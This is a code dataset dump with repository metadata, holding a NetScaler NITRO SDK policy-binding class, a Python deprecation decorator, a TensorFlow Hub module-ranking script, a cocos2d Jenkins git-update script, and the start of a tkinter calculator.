| column | dtype | values |
|---|---|---|
| hexsha | stringlengths | 40 – 40 |
| size | int64 | 2 – 1.02M |
| ext | stringclasses | 10 values |
| lang | stringclasses | 1 value |
| max_stars_repo_path | stringlengths | 4 – 245 |
| max_stars_repo_name | stringlengths | 6 – 130 |
| max_stars_repo_head_hexsha | stringlengths | 40 – 40 |
| max_stars_repo_licenses | listlengths | 1 – 10 |
| max_stars_count | int64 | 1 – 191k ⌀ |
| max_stars_repo_stars_event_min_datetime | stringlengths | 24 – 24 ⌀ |
| max_stars_repo_stars_event_max_datetime | stringlengths | 24 – 24 ⌀ |
| max_issues_repo_path | stringlengths | 4 – 245 |
| max_issues_repo_name | stringlengths | 6 – 130 |
| max_issues_repo_head_hexsha | stringlengths | 40 – 40 |
| max_issues_repo_licenses | listlengths | 1 – 10 |
| max_issues_count | int64 | 1 – 67k ⌀ |
| max_issues_repo_issues_event_min_datetime | stringlengths | 24 – 24 ⌀ |
| max_issues_repo_issues_event_max_datetime | stringlengths | 24 – 24 ⌀ |
| max_forks_repo_path | stringlengths | 4 – 245 |
| max_forks_repo_name | stringlengths | 6 – 130 |
| max_forks_repo_head_hexsha | stringlengths | 40 – 40 |
| max_forks_repo_licenses | listlengths | 1 – 10 |
| max_forks_count | int64 | 1 – 105k ⌀ |
| max_forks_repo_forks_event_min_datetime | stringlengths | 24 – 24 ⌀ |
| max_forks_repo_forks_event_max_datetime | stringlengths | 24 – 24 ⌀ |
| content | stringlengths | 2 – 1.02M |
| avg_line_length | float64 | 1 – 417k |
| max_line_length | int64 | 1 – 987k |
| alphanum_fraction | float64 | 0 – 1 |
| content_no_comment | stringlengths | 0 – 1.01M |
| is_comment_constant_removed | bool | 1 class |
| is_sharp_comment_removed | bool | 1 class |
f70b2df2d3725fc71df008004b4b4b9536a2e2e3 | 11,174 | py | Python | nssrc/com/citrix/netscaler/nitro/resource/config/lb/lbvserver_authorizationpolicy_binding.py | guardicore/nitro-python | 5346a5086134aead80968f15a41ff527adaa0ec1 | ["Apache-2.0"] | null | null | null | nssrc/com/citrix/netscaler/nitro/resource/config/lb/lbvserver_authorizationpolicy_binding.py | guardicore/nitro-python | 5346a5086134aead80968f15a41ff527adaa0ec1 | ["Apache-2.0"] | null | null | null | nssrc/com/citrix/netscaler/nitro/resource/config/lb/lbvserver_authorizationpolicy_binding.py | guardicore/nitro-python | 5346a5086134aead80968f15a41ff527adaa0ec1 | ["Apache-2.0"] | null | null | null |
#
# Copyright (c) 2021 Citrix Systems, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_resource
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_response
from nssrc.com.citrix.netscaler.nitro.service.options import options
from nssrc.com.citrix.netscaler.nitro.exception.nitro_exception import nitro_exception
from nssrc.com.citrix.netscaler.nitro.util.nitro_util import nitro_util
class lbvserver_authorizationpolicy_binding(base_resource) :
""" Binding class showing the authorizationpolicy that can be bound to lbvserver.
"""
def __init__(self) :
self._policyname = None
self._priority = None
self._sc = None
self._gotopriorityexpression = None
self._bindpoint = None
self._invoke = None
self._labeltype = None
self._labelname = None
self._name = None
self.___count = None
@property
def priority(self) :
r"""Priority.
"""
try :
return self._priority
except Exception as e:
raise e
@priority.setter
def priority(self, priority) :
r"""Priority.
"""
try :
self._priority = priority
except Exception as e:
raise e
@property
def bindpoint(self) :
r"""The bindpoint to which the policy is bound.<br/>Possible values = REQUEST, RESPONSE, MQTT_JUMBO_REQ.
"""
try :
return self._bindpoint
except Exception as e:
raise e
@bindpoint.setter
def bindpoint(self, bindpoint) :
r"""The bindpoint to which the policy is bound.<br/>Possible values = REQUEST, RESPONSE, MQTT_JUMBO_REQ
"""
try :
self._bindpoint = bindpoint
except Exception as e:
raise e
@property
def policyname(self) :
r"""Name of the policy bound to the LB vserver.
"""
try :
return self._policyname
except Exception as e:
raise e
@policyname.setter
def policyname(self, policyname) :
r"""Name of the policy bound to the LB vserver.
"""
try :
self._policyname = policyname
except Exception as e:
raise e
@property
def labelname(self) :
r"""Name of the label invoked.
"""
try :
return self._labelname
except Exception as e:
raise e
@labelname.setter
def labelname(self, labelname) :
r"""Name of the label invoked.
"""
try :
self._labelname = labelname
except Exception as e:
raise e
@property
def name(self) :
r"""Name for the virtual server. Must begin with an ASCII alphanumeric or underscore (_) character, and must contain only ASCII alphanumeric, underscore, hash (#), period (.), space, colon (:), at sign (@), equal sign (=), and hyphen (-) characters. Can be changed after the virtual server is created.
CLI Users: If the name includes one or more spaces, enclose the name in double or single quotation marks (for example, "my vserver" or 'my vserver').<br/>Minimum length = 1.
"""
try :
return self._name
except Exception as e:
raise e
@name.setter
def name(self, name) :
r"""Name for the virtual server. Must begin with an ASCII alphanumeric or underscore (_) character, and must contain only ASCII alphanumeric, underscore, hash (#), period (.), space, colon (:), at sign (@), equal sign (=), and hyphen (-) characters. Can be changed after the virtual server is created.
CLI Users: If the name includes one or more spaces, enclose the name in double or single quotation marks (for example, "my vserver" or 'my vserver').<br/>Minimum length = 1
"""
try :
self._name = name
except Exception as e:
raise e
@property
def gotopriorityexpression(self) :
r"""Expression specifying the priority of the next policy which will get evaluated if the current policy rule evaluates to TRUE.
"""
try :
return self._gotopriorityexpression
except Exception as e:
raise e
@gotopriorityexpression.setter
def gotopriorityexpression(self, gotopriorityexpression) :
r"""Expression specifying the priority of the next policy which will get evaluated if the current policy rule evaluates to TRUE.
"""
try :
self._gotopriorityexpression = gotopriorityexpression
except Exception as e:
raise e
@property
def invoke(self) :
r"""Invoke policies bound to a virtual server or policy label.
"""
try :
return self._invoke
except Exception as e:
raise e
@invoke.setter
def invoke(self, invoke) :
r"""Invoke policies bound to a virtual server or policy label.
"""
try :
self._invoke = invoke
except Exception as e:
raise e
@property
def labeltype(self) :
r"""The invocation type.<br/>Possible values = reqvserver, resvserver, policylabel.
"""
try :
return self._labeltype
except Exception as e:
raise e
@labeltype.setter
def labeltype(self, labeltype) :
r"""The invocation type.<br/>Possible values = reqvserver, resvserver, policylabel
"""
try :
self._labeltype = labeltype
except Exception as e:
raise e
@property
def sc(self) :
r"""Use SureConnect on the virtual server.<br/>Default value: OFF<br/>Possible values = ON, OFF.
"""
try :
return self._sc
except Exception as e:
raise e
def _get_nitro_response(self, service, response) :
r""" converts nitro response into object and returns the object array in case of get request.
"""
try :
result = service.payload_formatter.string_to_resource(lbvserver_authorizationpolicy_binding_response, response, self.__class__.__name__)
if(result.errorcode != 0) :
if (result.errorcode == 444) :
service.clear_session(self)
if result.severity :
if (result.severity == "ERROR") :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
else :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
return result.lbvserver_authorizationpolicy_binding
except Exception as e :
raise e
def _get_object_name(self) :
r""" Returns the value of object identifier argument
"""
try :
if self.name is not None :
return str(self.name)
return None
except Exception as e :
raise e
@classmethod
def filter_add_parameters(cls, resource) :
r""" Use this function to create a resource with only add operation specific parameters.
"""
addresource = lbvserver_authorizationpolicy_binding()
addresource.name = resource.name
addresource.policyname = resource.policyname
addresource.priority = resource.priority
addresource.gotopriorityexpression = resource.gotopriorityexpression
addresource.bindpoint = resource.bindpoint
addresource.invoke = resource.invoke
addresource.labeltype = resource.labeltype
addresource.labelname = resource.labelname
return addresource
@classmethod
def add(cls, client, resource) :
try :
if resource and type(resource) is not list :
updateresource = cls.filter_add_parameters(resource)
return updateresource.update_resource(client)
else :
if resource and len(resource) > 0 :
updateresources = [lbvserver_authorizationpolicy_binding() for _ in range(len(resource))]
for i in range(len(resource)) :
updateresources[i] = cls.filter_add_parameters(resource[i])
return cls.update_bulk_request(client, updateresources)
except Exception as e :
raise e
@classmethod
def filter_delete_parameters(cls, resource) :
r""" Use this function to create a resource with only delete operation specific parameters.
"""
deleteresource = lbvserver_authorizationpolicy_binding()
deleteresource.name = resource.name
deleteresource.policyname = resource.policyname
deleteresource.bindpoint = resource.bindpoint
deleteresource.priority = resource.priority
return deleteresource
@classmethod
def delete(cls, client, resource) :
try :
if resource and type(resource) is not list :
deleteresource = cls.filter_delete_parameters(resource)
return deleteresource.delete_resource(client)
else :
if resource and len(resource) > 0 :
deleteresources = [lbvserver_authorizationpolicy_binding() for _ in range(len(resource))]
for i in range(len(resource)) :
deleteresources[i] = cls.filter_delete_parameters(resource[i])
return cls.delete_bulk_request(client, deleteresources)
except Exception as e :
raise e
@classmethod
def get(cls, service, name="", option_="") :
r""" Use this API to fetch lbvserver_authorizationpolicy_binding resources.
"""
try :
if not name :
obj = lbvserver_authorizationpolicy_binding()
response = obj.get_resources(service, option_)
else :
obj = lbvserver_authorizationpolicy_binding()
obj.name = name
response = obj.get_resources(service)
return response
except Exception as e:
raise e
@classmethod
def get_filtered(cls, service, name, filter_) :
r""" Use this API to fetch filtered set of lbvserver_authorizationpolicy_binding resources.
Filter string should be in JSON format, e.g. "port:80,servicetype:HTTP".
"""
try :
obj = lbvserver_authorizationpolicy_binding()
obj.name = name
option_ = options()
option_.filter = filter_
response = obj.getfiltered(service, option_)
return response
except Exception as e:
raise e
@classmethod
def count(cls, service, name) :
r""" Use this API to count lbvserver_authorizationpolicy_binding resources configued on NetScaler.
"""
try :
obj = lbvserver_authorizationpolicy_binding()
obj.name = name
option_ = options()
option_.count = True
response = obj.get_resources(service, option_)
if response :
return response[0].__dict__['___count']
return 0
except Exception as e:
raise e
@classmethod
def count_filtered(cls, service, name, filter_) :
r""" Use this API to count the filtered set of lbvserver_authorizationpolicy_binding resources.
Filter string should be in JSON format, e.g. "port:80,servicetype:HTTP".
"""
try :
obj = lbvserver_authorizationpolicy_binding()
obj.name = name
option_ = options()
option_.count = True
option_.filter = filter_
response = obj.getfiltered(service, option_)
if response :
return response[0].__dict__['___count']
return 0
except Exception as e:
raise e
class Sc:
ON = "ON"
OFF = "OFF"
class Bindpoint:
REQUEST = "REQUEST"
RESPONSE = "RESPONSE"
MQTT_JUMBO_REQ = "MQTT_JUMBO_REQ"
class Labeltype:
reqvserver = "reqvserver"
resvserver = "resvserver"
policylabel = "policylabel"
class lbvserver_authorizationpolicy_binding_response(base_response) :
def __init__(self, length=1) :
self.lbvserver_authorizationpolicy_binding = []
self.errorcode = 0
self.message = ""
self.severity = ""
self.sessionid = ""
self.lbvserver_authorizationpolicy_binding = [lbvserver_authorizationpolicy_binding() for _ in range(length)]
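# --- Usage sketch (illustrative, not part of the original SDK file) ---
# A minimal, hedged example of driving this binding class; the address,
# credentials, vserver and policy names below are assumptions.
#
# from nssrc.com.citrix.netscaler.nitro.service.nitro_service import nitro_service
# client = nitro_service("10.0.0.1", "http")  # hypothetical NetScaler address
# client.login("nsroot", "nsroot")
# binding = lbvserver_authorizationpolicy_binding()
# binding.name = "my_lb_vserver"          # hypothetical vserver name
# binding.policyname = "my_authz_policy"  # hypothetical policy name
# binding.priority = 100
# lbvserver_authorizationpolicy_binding.add(client, binding)
# bound = lbvserver_authorizationpolicy_binding.get(client, name="my_lb_vserver")
# count = lbvserver_authorizationpolicy_binding.count(client, name="my_lb_vserver")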
| 30.446866 | 303 | 0.727761 |
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_resource
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_response
from nssrc.com.citrix.netscaler.nitro.service.options import options
from nssrc.com.citrix.netscaler.nitro.exception.nitro_exception import nitro_exception
from nssrc.com.citrix.netscaler.nitro.util.nitro_util import nitro_util
class lbvserver_authorizationpolicy_binding(base_resource) :
def __init__(self) :
self._policyname = None
self._priority = None
self._sc = None
self._gotopriorityexpression = None
self._bindpoint = None
self._invoke = None
self._labeltype = None
self._labelname = None
self._name = None
self.___count = None
@property
def priority(self) :
try :
return self._priority
except Exception as e:
raise e
@priority.setter
def priority(self, priority) :
try :
self._priority = priority
except Exception as e:
raise e
@property
def bindpoint(self) :
try :
return self._bindpoint
except Exception as e:
raise e
@bindpoint.setter
def bindpoint(self, bindpoint) :
try :
self._bindpoint = bindpoint
except Exception as e:
raise e
@property
def policyname(self) :
try :
return self._policyname
except Exception as e:
raise e
@policyname.setter
def policyname(self, policyname) :
try :
self._policyname = policyname
except Exception as e:
raise e
@property
def labelname(self) :
try :
return self._labelname
except Exception as e:
raise e
@labelname.setter
def labelname(self, labelname) :
try :
self._labelname = labelname
except Exception as e:
raise e
@property
def name(self) :
try :
return self._name
except Exception as e:
raise e
@name.setter
def name(self, name) :
try :
self._name = name
except Exception as e:
raise e
@property
def gotopriorityexpression(self) :
try :
return self._gotopriorityexpression
except Exception as e:
raise e
@gotopriorityexpression.setter
def gotopriorityexpression(self, gotopriorityexpression) :
try :
self._gotopriorityexpression = gotopriorityexpression
except Exception as e:
raise e
@property
def invoke(self) :
try :
return self._invoke
except Exception as e:
raise e
@invoke.setter
def invoke(self, invoke) :
try :
self._invoke = invoke
except Exception as e:
raise e
@property
def labeltype(self) :
try :
return self._labeltype
except Exception as e:
raise e
@labeltype.setter
def labeltype(self, labeltype) :
try :
self._labeltype = labeltype
except Exception as e:
raise e
@property
def sc(self) :
try :
return self._sc
except Exception as e:
raise e
def _get_nitro_response(self, service, response) :
try :
result = service.payload_formatter.string_to_resource(lbvserver_authorizationpolicy_binding_response, response, self.__class__.__name__)
if(result.errorcode != 0) :
if (result.errorcode == 444) :
service.clear_session(self)
if result.severity :
if (result.severity == "ERROR") :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
else :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
return result.lbvserver_authorizationpolicy_binding
except Exception as e :
raise e
def _get_object_name(self) :
try :
if self.name is not None :
return str(self.name)
return None
except Exception as e :
raise e
@classmethod
def filter_add_parameters(cls, resource) :
addresource = lbvserver_authorizationpolicy_binding()
addresource.name = resource.name
addresource.policyname = resource.policyname
addresource.priority = resource.priority
addresource.gotopriorityexpression = resource.gotopriorityexpression
addresource.bindpoint = resource.bindpoint
addresource.invoke = resource.invoke
addresource.labeltype = resource.labeltype
addresource.labelname = resource.labelname
return addresource
@classmethod
def add(cls, client, resource) :
try :
if resource and type(resource) is not list :
updateresource = cls.filter_add_parameters(resource)
return updateresource.update_resource(client)
else :
if resource and len(resource) > 0 :
updateresources = [lbvserver_authorizationpolicy_binding() for _ in range(len(resource))]
for i in range(len(resource)) :
updateresources[i] = cls.filter_add_parameters(resource[i])
return cls.update_bulk_request(client, updateresources)
except Exception as e :
raise e
@classmethod
def filter_delete_parameters(cls, resource) :
deleteresource = lbvserver_authorizationpolicy_binding()
deleteresource.name = resource.name
deleteresource.policyname = resource.policyname
deleteresource.bindpoint = resource.bindpoint
deleteresource.priority = resource.priority
return deleteresource
@classmethod
def delete(cls, client, resource) :
try :
if resource and type(resource) is not list :
deleteresource = cls.filter_delete_parameters(resource)
return deleteresource.delete_resource(client)
else :
if resource and len(resource) > 0 :
deleteresources = [lbvserver_authorizationpolicy_binding() for _ in range(len(resource))]
for i in range(len(resource)) :
deleteresources[i] = cls.filter_delete_parameters(resource[i])
return cls.delete_bulk_request(client, deleteresources)
except Exception as e :
raise e
@classmethod
def get(cls, service, name="", option_="") :
try :
if not name :
obj = lbvserver_authorizationpolicy_binding()
response = obj.get_resources(service, option_)
else :
obj = lbvserver_authorizationpolicy_binding()
obj.name = name
response = obj.get_resources(service)
return response
except Exception as e:
raise e
@classmethod
def get_filtered(cls, service, name, filter_) :
try :
obj = lbvserver_authorizationpolicy_binding()
obj.name = name
option_ = options()
option_.filter = filter_
response = obj.getfiltered(service, option_)
return response
except Exception as e:
raise e
@classmethod
def count(cls, service, name) :
try :
obj = lbvserver_authorizationpolicy_binding()
obj.name = name
option_ = options()
option_.count = True
response = obj.get_resources(service, option_)
if response :
return response[0].__dict__['___count']
return 0
except Exception as e:
raise e
@classmethod
def count_filtered(cls, service, name, filter_) :
try :
obj = lbvserver_authorizationpolicy_binding()
obj.name = name
option_ = options()
option_.count = True
option_.filter = filter_
response = obj.getfiltered(service, option_)
if response :
return response[0].__dict__['___count']
return 0
except Exception as e:
raise e
class Sc:
ON = "ON"
OFF = "OFF"
class Bindpoint:
REQUEST = "REQUEST"
RESPONSE = "RESPONSE"
MQTT_JUMBO_REQ = "MQTT_JUMBO_REQ"
class Labeltype:
reqvserver = "reqvserver"
resvserver = "resvserver"
policylabel = "policylabel"
class lbvserver_authorizationpolicy_binding_response(base_response) :
def __init__(self, length=1) :
self.lbvserver_authorizationpolicy_binding = []
self.errorcode = 0
self.message = ""
self.severity = ""
self.sessionid = ""
self.lbvserver_authorizationpolicy_binding = [lbvserver_authorizationpolicy_binding() for _ in range(length)]
| true | true |
f70b2e7d6d785782beab4bceff912f823fd8f608 | 2,048 | py | Python | myvenv/Lib/site-packages/graphene/utils/deprecated.py | Fa67/saleor-shop | 76110349162c54c8bfcae61983bb59ba8fb0f778 | ["BSD-3-Clause"] | 1 | 2020-03-14T11:00:14.000Z | 2020-03-14T11:00:14.000Z | graphene/utils/deprecated.py | djedi/graphene | 2cc701f444f29fc24b4ecf801e906e0f17954c46 | ["MIT"] | null | null | null | graphene/utils/deprecated.py | djedi/graphene | 2cc701f444f29fc24b4ecf801e906e0f17954c46 | ["MIT"] | 1 | 2020-07-23T17:53:27.000Z | 2020-07-23T17:53:27.000Z |
import functools
import inspect
import warnings
string_types = (type(b''), type(u''))
def warn_deprecation(text):
warnings.simplefilter('always', DeprecationWarning)
warnings.warn(
text,
category=DeprecationWarning,
stacklevel=2
)
warnings.simplefilter('default', DeprecationWarning)
def deprecated(reason):
"""
This is a decorator which can be used to mark functions
as deprecated. It will result in a warning being emitted
when the function is used.
"""
if isinstance(reason, string_types):
# The @deprecated is used with a 'reason'.
#
# .. code-block:: python
#
# @deprecated("please, use another function")
# def old_function(x, y):
# pass
def decorator(func1):
if inspect.isclass(func1):
fmt1 = "Call to deprecated class {name} ({reason})."
else:
fmt1 = "Call to deprecated function {name} ({reason})."
@functools.wraps(func1)
def new_func1(*args, **kwargs):
warn_deprecation(
fmt1.format(name=func1.__name__, reason=reason),
)
return func1(*args, **kwargs)
return new_func1
return decorator
elif inspect.isclass(reason) or inspect.isfunction(reason):
# The @deprecated is used without any 'reason'.
#
# .. code-block:: python
#
# @deprecated
# def old_function(x, y):
# pass
func2 = reason
if inspect.isclass(func2):
fmt2 = "Call to deprecated class {name}."
else:
fmt2 = "Call to deprecated function {name}."
@functools.wraps(func2)
def new_func2(*args, **kwargs):
warn_deprecation(
fmt2.format(name=func2.__name__),
)
return func2(*args, **kwargs)
return new_func2
else:
raise TypeError(repr(type(reason)))
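# --- Usage sketch (illustrative, not part of the original module) ---
# Both decorator forms described in the docstring, end to end:
#
# @deprecated("please, use another function")
# def old_function(x, y):
#     return x + y
#
# @deprecated
# def older_function(x, y):
#     return x - y
#
# old_function(1, 2)    # warns: Call to deprecated function old_function (please, use another function).
# older_function(1, 2)  # warns: Call to deprecated function older_function.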
| 25.283951 | 71 | 0.552246 |
import functools
import inspect
import warnings
string_types = (type(b''), type(u''))
def warn_deprecation(text):
warnings.simplefilter('always', DeprecationWarning)
warnings.warn(
text,
category=DeprecationWarning,
stacklevel=2
)
warnings.simplefilter('default', DeprecationWarning)
def deprecated(reason):
if isinstance(reason, string_types):
def decorator(func1):
if inspect.isclass(func1):
fmt1 = "Call to deprecated class {name} ({reason})."
else:
fmt1 = "Call to deprecated function {name} ({reason})."
@functools.wraps(func1)
def new_func1(*args, **kwargs):
warn_deprecation(
fmt1.format(name=func1.__name__, reason=reason),
)
return func1(*args, **kwargs)
return new_func1
return decorator
elif inspect.isclass(reason) or inspect.isfunction(reason):
func2 = reason
if inspect.isclass(func2):
fmt2 = "Call to deprecated class {name}."
else:
fmt2 = "Call to deprecated function {name}."
@functools.wraps(func2)
def new_func2(*args, **kwargs):
warn_deprecation(
fmt2.format(name=func2.__name__),
)
return func2(*args, **kwargs)
return new_func2
else:
raise TypeError(repr(type(reason)))
| true | true |
f70b30d771a35c7efbe0ded4d37ce49fadffd46f | 3,958 | py | Python | tensorflow_hub/tools/module_search/search.py | AyazSaiyed/hub | 597c5726fd72d17f562bffec25e114115dadcac5 | ["Apache-2.0"] | null | null | null | tensorflow_hub/tools/module_search/search.py | AyazSaiyed/hub | 597c5726fd72d17f562bffec25e114115dadcac5 | ["Apache-2.0"] | null | null | null | tensorflow_hub/tools/module_search/search.py | AyazSaiyed/hub | 597c5726fd72d17f562bffec25e114115dadcac5 | ["Apache-2.0"] | null | null | null |
# Copyright 2019 The TensorFlow Hub Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tool to rank modules to use in a downstream classification task."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl import app
from absl import flags
import pandas as pd
import numpy as np
import tensorflow.compat.v2 as tf
from tensorflow_hub.tools.module_search import utils
FLAGS = flags.FLAGS
flags.DEFINE_string("dataset", None,
"Specification of a dataset. E.g. use `cifar10#1000` to "
"perform search using 1000 examples from tfds `cifar10` "
"dataset.")
flags.DEFINE_multi_string("module", None, "Module to consider in the search")
flags.DEFINE_string("module_list", None,
"Path to text file with a module per line to be considered in the search."
"Empty lines and lines starting with # are ignored")
def load_data(data_spec):
return utils.load_data(**data_spec)
def load_raw_features(data_spec):
data = load_data(data_spec=data_spec)
return data.map(lambda x: tf.image.resize(x["image"], (224, 224)))
def load_labels(data_spec):
data = load_data(data_spec=data_spec)
return np.array([x for x in data.map(lambda x: x["label"])])
def compute_embeddings(module_spec, data_spec):
raw_features = load_raw_features(data_spec=data_spec)
embedding_fn = utils.load_embedding_fn(
module=module_spec)
outputs = []
for batch in raw_features.batch(10):
outputs.extend(embedding_fn(batch))
return np.array(outputs)
def compute_score(module_spec, data_spec):
embeddings = compute_embeddings(module_spec=module_spec,
data_spec=data_spec)
distances = utils.compute_distance_matrix_loo(embeddings)
labels = load_labels(data_spec=data_spec)
error_rate = utils.knn_errorrate_loo(distances, labels, k=1)
return np.array(error_rate)
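# Scoring idea, summarised (comment only): the score for a module is the
# leave-one-out 1-nearest-neighbour error rate of its embeddings on the
# sampled dataset, so lower values are better and modules can be ranked
# by this number directly (the "1nn" column below).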
def main(argv):
if len(argv) > 1:
raise app.UsageError('Too many command-line arguments.')
if not FLAGS.dataset:
raise app.UsageError("--dataset is a required argument.")
module_list = []
if FLAGS.module:
module_list.extend(FLAGS.module)
if FLAGS.module_list:
with tf.io.gfile.GFile(FLAGS.module_list) as f:
lines = f.read().split("\n")
module_list.extend([l for l in lines if l != "" and not l.startswith("#")])
ds_sections = FLAGS.dataset.split("#")
dataset = ds_sections[0]
train_examples = int(ds_sections[1]) if len(ds_sections) > 1 else None
data_spec = {
"dataset": dataset,
"split": "train",
"num_examples": train_examples,
}
results = []
for module in module_list:
results.append((
module, data_spec,
compute_score(module_spec=module, data_spec=data_spec)))
df = pd.DataFrame(results, columns=["module", "data", "1nn"])
df = df.filter(["module", "1nn"])
df = df.sort_values(["1nn"])
df = df.reset_index(drop=True)
df = df.set_index("module")
with pd.option_context(
"display.max_rows", None,
"display.max_columns", None,
"display.precision", 3,
"max_colwidth", -1, # Don't truncate columns (e.g. module name).
"display.expand_frame_repr", False, # Don't wrap output.
):
print("# Module ranking for %s" % data_spec)
print(df)
if __name__ == '__main__':
app.run(main)
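# --- Example invocation (hedged; the module handle and list path are hypothetical) ---
# python -m tensorflow_hub.tools.module_search.search \
#     --dataset=cifar10#1000 \
#     --module=https://tfhub.dev/google/imagenet/mobilenet_v2_100_224/feature_vector/4 \
#     --module_list=/tmp/modules.txt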
| 31.165354 | 81 | 0.6905 |
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl import app
from absl import flags
import pandas as pd
import numpy as np
import tensorflow.compat.v2 as tf
from tensorflow_hub.tools.module_search import utils
FLAGS = flags.FLAGS
flags.DEFINE_string("dataset", None,
"Specification of a dataset. E.g. use `cifar10#1000` to "
"perform search using 1000 examples from tfds `cifar10` "
"dataset.")
flags.DEFINE_multi_string("module", None, "Module to consider in the search")
flags.DEFINE_string("module_list", None,
"Path to text file with a module per line to be considered in the search."
"Empty lines and lines starting with # are ignored")
def load_data(data_spec):
return utils.load_data(**data_spec)
def load_raw_features(data_spec):
data = load_data(data_spec=data_spec)
return data.map(lambda x: tf.image.resize(x["image"], (224, 224)))
def load_labels(data_spec):
data = load_data(data_spec=data_spec)
return np.array([x for x in data.map(lambda x: x["label"])])
def compute_embeddings(module_spec, data_spec):
raw_features = load_raw_features(data_spec=data_spec)
embedding_fn = utils.load_embedding_fn(
module=module_spec)
outputs = []
for batch in raw_features.batch(10):
outputs.extend(embedding_fn(batch))
return np.array(outputs)
def compute_score(module_spec, data_spec):
embeddings = compute_embeddings(module_spec=module_spec,
data_spec=data_spec)
distances = utils.compute_distance_matrix_loo(embeddings)
labels = load_labels(data_spec=data_spec)
error_rate = utils.knn_errorrate_loo(distances, labels, k=1)
return np.array(error_rate)
def main(argv):
if len(argv) > 1:
raise app.UsageError('Too many command-line arguments.')
if not FLAGS.dataset:
raise app.UsageError("--dataset is a required argument.")
module_list = []
if FLAGS.module:
module_list.extend(FLAGS.module)
if FLAGS.module_list:
with tf.io.gfile.GFile(FLAGS.module_list) as f:
lines = f.read().split("\n")
module_list.extend([l for l in lines if l != "" and not l.startswith("#")])
ds_sections = FLAGS.dataset.split("#")
dataset = ds_sections[0]
train_examples = int(ds_sections[1]) if len(ds_sections) > 1 else None
data_spec = {
"dataset": dataset,
"split": "train",
"num_examples": train_examples,
}
results = []
for module in module_list:
results.append((
module, data_spec,
compute_score(module_spec=module, data_spec=data_spec)))
df = pd.DataFrame(results, columns=["module", "data", "1nn"])
df = df.filter(["module", "1nn"])
df = df.sort_values(["1nn"])
df = df.reset_index(drop=True)
df = df.set_index("module")
with pd.option_context(
"display.max_rows", None,
"display.max_columns", None,
"display.precision", 3,
"max_colwidth", -1,
"display.expand_frame_repr", False, # Don't wrap output.
):
print("# Module ranking for %s" % data_spec)
print(df)
if __name__ == '__main__':
app.run(main)
| true | true |
f70b31d56870f47049de83d268a95ddd4d102068 | 597 | py | Python | Cocos2dx-3x/PhotoExample/cocos2d/tools/jenkins-scripts/configs/cocos-2dx-develop-base-repo.py | ezibyte/EziSocial-PhotoExample | 12818880696d3f76ffd5b66646bab21fa3619821 | ["Apache-2.0"] | 14 | 2015-01-29T08:41:15.000Z | 2017-09-03T14:29:32.000Z | Cocos2dx-3x/PhotoExample/cocos2d/tools/jenkins-scripts/configs/cocos-2dx-develop-base-repo.py | ezibyte/EziSocial-PhotoExample | 12818880696d3f76ffd5b66646bab21fa3619821 | ["Apache-2.0"] | 1 | 2016-09-20T10:54:53.000Z | 2016-09-20T10:54:53.000Z | Cocos2dx-3x/PhotoExample/cocos2d/tools/jenkins-scripts/configs/cocos-2dx-develop-base-repo.py | ezibyte/EziSocial-PhotoExample | 12818880696d3f76ffd5b66646bab21fa3619821 | ["Apache-2.0"] | 22 | 2015-01-05T08:07:50.000Z | 2019-03-25T07:52:48.000Z |
import os
import sys
def check_ret(ret):
if(ret != 0):
os.system('git checkout -B develop remotes/origin/develop')
os.system('git clean -xdf -f')
sys.exit(1)
branches = ['develop', 'master']
for item in branches:
os.system('git clean -xdf -f')
os.system('git checkout -B ' + item + ' remotes/origin/' + item)
os.system('git clean -xdf -f')
ret = os.system('git pull origin')
check_ret(ret)
ret = os.system('git submodule update --init --force')
check_ret(ret)
#back to develop
os.system('git checkout -B develop remotes/origin/develop')
os.system('git clean -xdf -f')
| 25.956522 | 66 | 0.663317 |
import os
import sys
def check_ret(ret):
if(ret != 0):
os.system('git checkout -B develop remotes/origin/develop')
os.system('git clean -xdf -f')
sys.exit(1)
branches = ['develop', 'master']
for item in branches:
os.system('git clean -xdf -f')
os.system('git checkout -B ' + item + ' remotes/origin/' + item)
os.system('git clean -xdf -f')
ret = os.system('git pull origin')
check_ret(ret)
ret = os.system('git submodule update --init --force')
check_ret(ret)
os.system('git checkout -B develop remotes/origin/develop')
os.system('git clean -xdf -f')
| true | true |
f70b3234c9f1d13265bf86914670fa4ef4dbce17 | 8,382 | py | Python | Calculator/calculator.py | wuhaowei/tkinter-projects | b2ce55d1d347316cc7d37d5180847b67c19dd413 | ["MIT"] | null | null | null | Calculator/calculator.py | wuhaowei/tkinter-projects | b2ce55d1d347316cc7d37d5180847b67c19dd413 | ["MIT"] | null | null | null | Calculator/calculator.py | wuhaowei/tkinter-projects | b2ce55d1d347316cc7d37d5180847b67c19dd413 | ["MIT"] | 1 | 2021-02-20T05:29:31.000Z | 2021-02-20T05:29:31.000Z |
"""
Name: Tkinter Exercise - a simple calculator
Description: iOS calculator simulator
Date: 2/21/2018
Author: Haowei Wu
"""
import tkinter
class Calculator:
# Params
app_title = "A simple calculator"
disp_font = ("Helvetica", 25, "bold")
btn_font = ("Helvetica", 20, "bold")
def __init__(self, root):
self.root = root
self.initialize()
def initialize(self):
# Variables
self.ans = "0"
self.operator = None
self.user_input = ""
self.last_user_input = ""
self.is_result = False
self.ever_equals = False
self.true_equal = False
# GUI
self.set_title()
